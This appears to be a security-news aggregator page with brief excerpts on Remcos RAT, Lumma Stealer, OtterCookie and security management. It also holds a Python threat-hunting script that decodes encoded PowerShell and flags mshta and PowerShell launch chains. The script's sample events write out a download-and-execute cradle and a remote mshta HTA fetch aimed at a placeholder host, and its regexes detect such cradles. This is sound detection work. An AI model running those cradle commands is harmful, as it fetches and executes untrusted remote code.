Fileless Remcos RAT Delivered via LNK Files and MSHTA in PowerShell-Based Attacks

Cybersecurity researchers have shed light on a new malware campaign that makes use of a PowerShell-based shellcode loader to deploy a remote access trojan called Remcos RAT. “Threat actors delivered malicious LNK files embedded within ZIP archives, often disguised as Office documents,” Qualys security researcher Akshay Thorve said in a technical report. “The attack chain…

4 critical leadership priorities for CISOs in the AI era

Everyone knows CISOs aren’t really working that hard in those cushy offices. Heck, they’re only thwarting compliance nightmares, blocking costly cyberattacks, protecting employees from predatory phishing emails, and now dodging the feds. You know, just the little things needed to safeguard an organization’s information assets. Kidding, of course. In fact, as artificial intelligence (AI) and generative AI (genAI) permeate and transform businesses, chief information security…

What is business resilience? | Definition from TechTarget

Business resilience is an organization’s ability to adapt quickly to disruptions while maintaining continuous business operations and safeguarding people, assets and overall brand equity. Transcending disaster recovery (DR) and business continuity (BC), business resilience offers post-disaster strategies to avoid costly downtime, shore up vulnerabilities and maintain business operations in the face of additional, unexpected outages…

How Compliance Training Software Protects Your Business from Risk

The modern business environment exposes organizations to a range of challenges that affect business operations, hence the need for robust regulations. Ignoring standards and guidelines can lead to costly fines, operational disruptions, and reputational damage. Last year, a US court ordered a bank to pay US$3 billion in fines—the biggest in history—for having weak monitoring…

Breaking down silos in cybersecurity – Help Net Security

All organizations erect silos – silos between groups and departments, across functions and among technologies. Silos represent differences in practices, culture and operations. Their presence inhibits communication and collaboration. As companies scale from startup to mid-sized and beyond, silos multiply and ossify. As operations expand from one site to many, from on-premises to cloud, from…

Lumma Stealer, coming and going

In September 2024, a threat hunt across Sophos Managed Detection and Response’s telemetry uncovered a Lumma Stealer campaign using fake CAPTCHA sites that instructed victims to paste a (malicious) PowerShell-encoded command into Windows’ command-line interface. Subsequent investigations allowed us to dig deeply into the mechanics of the notorious information stealer. This post recounts those discoveries,…
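The Remcos item above describes LNK files launching MSHTA and then a PowerShell loader, and the Lumma item describes victims pasting an encoded PowerShell command themselves. The following is an added example, not code from this page, from Qualys or from Sophos, showing how a threat hunter could decode `-EncodedCommand` payloads and flag both process-lineage patterns in process-creation telemetry. The sample events, the `example.invalid` URLs and the heuristic that a pasted command shows up with `explorer.exe` as parent are constructed assumptions for illustration.

```python
import base64
import re
from typing import List, Optional, Tuple

# PowerShell accepts -EncodedCommand and its documented short forms (-e, -ec, -en, -enc).
# The argument is base64 of the script text encoded as UTF-16LE.
ENC_ARG_RE = re.compile(r"(?i)(?:^|\s)[-/](?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{8,})")
# Indicators of a download-and-execute cradle inside the decoded script.
CRADLE_RE = re.compile(r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest|iwr)\b|https?://")
URL_RE = re.compile(r"(?i)https?://")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    m = ENC_ARG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # bad base64 (binascii.Error) or odd-length / invalid UTF-16
        return None


def classify_event(evt: dict) -> List[str]:
    """Tag one process-creation event; an empty list means nothing suspicious."""
    tags: List[str] = []
    image = evt["image"].lower()
    parent = evt["parent"].lower()
    cmd = evt["cmdline"]
    decoded = decode_encoded_command(cmd) if image in ("powershell.exe", "pwsh.exe") else None
    if decoded is not None:
        tags.append("encoded_powershell")
        # Assumed heuristic: a command pasted by the user arrives with explorer.exe as
        # parent; combined with a download cradle this resembles the fake-CAPTCHA lure.
        if parent == "explorer.exe" and CRADLE_RE.search(decoded):
            tags.append("clickfix_candidate")
    # mshta.exe pulling an HTA from a remote URL (LNK -> mshta stage).
    if image == "mshta.exe" and URL_RE.search(cmd):
        tags.append("mshta_remote")
    # mshta.exe handing off to PowerShell (mshta -> PowerShell loader stage).
    if parent == "mshta.exe" and image in ("powershell.exe", "pwsh.exe"):
        tags.append("mshta_to_powershell")
    return tags


def hunt(events: List[dict]) -> List[Tuple[int, List[str], Optional[str]]]:
    """Return (index, tags, decoded script) for every event that received a tag."""
    findings = []
    for i, evt in enumerate(events):
        tags = classify_event(evt)
        if tags:
            findings.append((i, tags, decode_encoded_command(evt["cmdline"])))
    return findings


def _enc(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry; none of this comes from the page or from real systems.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')")},
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": 'mshta.exe "http://example.invalid/a.hta"'},
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -c "Start-Sleep 1"'},
    {"parent": "svchost.exe", "image": "powershell.exe",  # benign scheduled script
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"parent": "explorer.exe", "image": "powershell.exe",  # encoded but harmless
     "cmdline": "powershell.exe -enc " + _enc("Get-Date")},
]

if __name__ == "__main__":
    for idx, tags, decoded in hunt(SAMPLE_EVENTS):
        print(idx, tags, repr(decoded))
```

The decoder is the piece worth keeping: an encoded command alone is common in legitimate automation (the last sample event), so the alert logic keys on what the decoded script does and on which process launched it, not on the mere presence of `-enc`.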

OtterCookie v4 Adds VM Detection and Chrome, MetaMask Credential Theft Capabilities

The North Korean threat actors behind the Contagious Interview campaign have been observed using updated versions of a cross-platform malware called OtterCookie with capabilities to steal credentials from web browsers and other files. NTT Security Holdings, which detailed the new findings, said the attackers have “actively and continuously” updated the malware, introducing versions v3 and…
